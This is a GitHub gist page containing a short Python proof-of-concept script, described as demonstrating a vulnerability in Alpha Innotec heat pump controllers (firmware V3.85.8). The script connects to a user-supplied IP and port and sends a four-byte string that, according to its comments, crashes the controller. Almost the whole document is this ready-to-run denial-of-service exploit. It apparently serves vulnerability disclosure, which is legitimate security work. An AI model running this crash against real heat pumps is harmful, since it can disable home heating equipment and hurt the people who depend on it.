Skip to content

Instantly share code, notes, and snippets.

@kbabioch

kbabioch/crash-heatpump.py

Last active March 22, 2023 10:42
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save kbabioch/7281545fb36d8e658c304a621a10f67e to your computer and use it in GitHub Desktop.
Save kbabioch/7281545fb36d8e658c304a621a10f67e to your computer and use it in GitHub Desktop.
Download ZIP
Demonstation of a vulnerability in Alpha Innotec heatpumps (firmware version V3.85.8 (r7193)).
Raw
crash-heatpump.py
#! /usr/bin/env python3
import argparse
import socket
parser = argparse.ArgumentParser()
parser.add_argument('ip')
parser.add_argument('port', type=int)
args = parser.parse_args()
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM);
client.connect((args.ip, args.port))
# This does not crash the controller
client.send("aaa".encode());
# This will crash the controller
client.send("aaaa".encode());
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment